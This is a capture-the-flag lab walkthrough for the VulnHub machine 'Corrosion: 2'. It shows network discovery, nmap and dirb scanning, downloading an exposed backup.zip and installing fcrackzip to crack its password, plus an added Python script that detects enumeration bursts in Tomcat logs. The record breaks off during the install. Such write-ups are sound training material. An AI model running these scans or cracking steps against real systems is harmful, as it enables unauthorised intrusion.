VulnHub Lab Walkthrough No. 307: Corrosion: 2
Proxy Programmer’s Corrosion: 2
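A medium-difficulty Vulnhub machine. The lab can be downloaded from https://www.vulnhub.com/entry/corrosion-2,745/#description . It is designed for experienced CTF players and is meant to help them test their abilities in a variety of situations. So let's get started and see how to break it down into smaller modules.
Network Scanning
First, we have to scan the network with the netdiscover command to find the target machine's IP address.
Network discovery
In this case, the victim's IP address is 192.168.74.128.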
┌──(root㉿kali)-[~]
└─# netdiscover
Currently scanning: 172.23.193.0/16 | Screen View: Unique Hosts
265 Captured ARP Req/Rep packets, from 4 hosts. Total size: 15900
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.74.1 00:50:56:c0:00:08 238 14280 VMware, Inc.
192.168.74.2 00:50:56:eb:d3:ae 12 720 VMware, Inc.
192.168.74.128 00:0c:29:ca:74:6c 11 660 VMware, Inc.
192.168.74.254 00:50:56:ec:7b:ae 4 240 VMware, Inc.
Next we use Nmap to move the process forward. Its version scan shows which services are currently available on the target.
nmap -sV 192.168.74.128
┌──(kali㉿kali)-[~]
└─$ nmap -sV 192.168.74.128
Starting Nmap 7.93 ( https://nmap.org ) at 2025-05-18 07:01 EDT
Nmap scan report for 192.168.74.128
Host is up (0.00059s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
8080/tcp open http Apache Tomcat 9.0.53
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds
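According to the nmap output, we have:
An SSH server on port 22.
An HTTP service (Apache server) on port 80.
A Tomcat server running on port 8080.
Enumeration
We start by looking at the http service on port 80. There is nothing unusual here, just an Apache server page.
Next, we looked at the Tomcat server, which is listening on port 8080. It is a simple page with nothing suspicious.
We did not find anything harmful on the website. So, to take the exercise further, we use dirb to enumerate directories and gather some information. Great! We found a directory that contains a backup zip file.
dirb http://192.168.74.128:8080/ -X .php,.zip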
┌──(kali㉿kali)-[~]
└─$ dirb http://192.168.74.128:8080/ -X .php,.zip
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 18 07:19:54 2025
URL_BASE: http://192.168.74.128:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.php,.zip) | (.php)(.zip) [NUM = 2]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.74.128:8080/ ----
+ http://192.168.74.128:8080/backup.zip (CODE:200|SIZE:33723)
-----------------
END_TIME: Sun May 18 07:20:02 2025
DOWNLOADED: 9224 - FOUND: 1
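From the defender's side, a dirb run like the one above stands out in the Tomcat access log: a burst of 404 responses to one client within seconds, plus a 200 for an archive file. The following Python script is an added example, not part of the original walkthrough, that flags such clients and lists the archives they were served. It assumes the access log uses Tomcat's "common" pattern; the client addresses and log lines in `sample_log` are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: host, two ids, [time], "request", status, bytes
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) \S+')
ARCHIVE = re.compile(r'\.(zip|tar|tgz|gz|7z|bak|sql)$', re.I)

def parse(line):
    m = LINE.match(line)
    if not m:
        return None  # skip lines that are not in the expected format
    ip, ts, path, status = m.groups()
    when = datetime.strptime(ts, '%d/%b/%Y:%H:%M:%S %z')
    return ip, when, path.split('?')[0], int(status)

def find_enumeration(lines, window=timedelta(seconds=10), min_404=20):
    """Map each client that produced >= min_404 404s inside one sliding
    window to the archive paths the server answered with 200 for it."""
    misses, hits = defaultdict(list), defaultdict(set)
    for ip, when, path, status in filter(None, map(parse, lines)):
        if status == 404:
            misses[ip].append(when)
        elif status == 200 and ARCHIVE.search(path):
            hits[ip].add(path)
    flagged = {}
    for ip, times in misses.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # shrink window from the left
                start += 1
            if end - start + 1 >= min_404:
                flagged[ip] = sorted(hits[ip])
                break
    return flagged

def sample_log():
    """Constructed log lines: one noisy client, one ordinary visitor."""
    fmt = '{} - - [18/May/2025:07:{} -0400] "GET {} HTTP/1.1" {} {}'
    lines = [fmt.format('192.0.2.10', f'19:{54 + i // 10}', f'/word{i}.zip', 404, 682)
             for i in range(40)]
    lines.append(fmt.format('192.0.2.10', '19:58', '/backup.zip', 200, 33723))
    lines.append(fmt.format('192.0.2.20', '25:01', '/', 200, 1895))
    lines.append(fmt.format('192.0.2.20', '25:02', '/favicon.ico', 404, 682))
    return lines

if __name__ == '__main__':
    for ip, paths in find_enumeration(sample_log()).items():
        print(f'{ip}: enumeration burst; archives served: {paths}')
```

Any archive path this reports is a file the web server is handing out to unauthenticated clients, so it should be removed from the served directory regardless of who requested it.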
Then use the wget command to download the backup zip file.
┌──(kali㉿kali)-[~]
└─$
wget http://192.168.74.128:8080/backup.zip
unzip backup.zip
--2025-05-18 07:57:24-- http://192.168.74.128:8080/backup.zip
Connecting to 192.168.74.128:8080... connected.
HTTP request sent, awaiting response... 200
Length: 33723 (33K) [application/zip]
Saving to: ‘backup.zip’
backup.zip 100%[================>] 32.93K --.-KB/s in 0s
2025-05-18 07:57:24 (352 MB/s) - ‘backup.zip’ saved [33723/33723]
Archive: backup.zip
[backup.zip] catalina.policy password:
┌──(kali㉿kali)-[~]
└─$ sudo apt install fcrackzip
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
libfcgi-bin libnsl-dev libregexp-assemble-perl libtirpc-dev
Use 'sudo apt autoremove' to remove them.
Suggested packages:
wordlist
The following NEW packages will be installed:
fcrackzip
0 upgraded, 1 newly installed, 0 to remove and 1994 not upgraded.
Need to get 27.5 kB of archives.
After this operation, 81.9 kB of additional disk space will be used.
Get:1 http://free.nchc.org.tw/kali kali-rolling/main amd64 fcrackzip amd64 1.0-12 [27.5 kB]
Fetched 27.5 kB in 4s (6,759 B/s)
Selecting previously unselected package fcrackzip.
(Reading database ... 395193 files and directories currently installed.)
Preparing to unpack .../fcrackzip_1.0-12_amd64.deb ...
Unpacking fcrackzip (1.0-12) ...
Setting up fcrackzip (1.0-12) ...
Processing triggers for man-db (2.11.2-1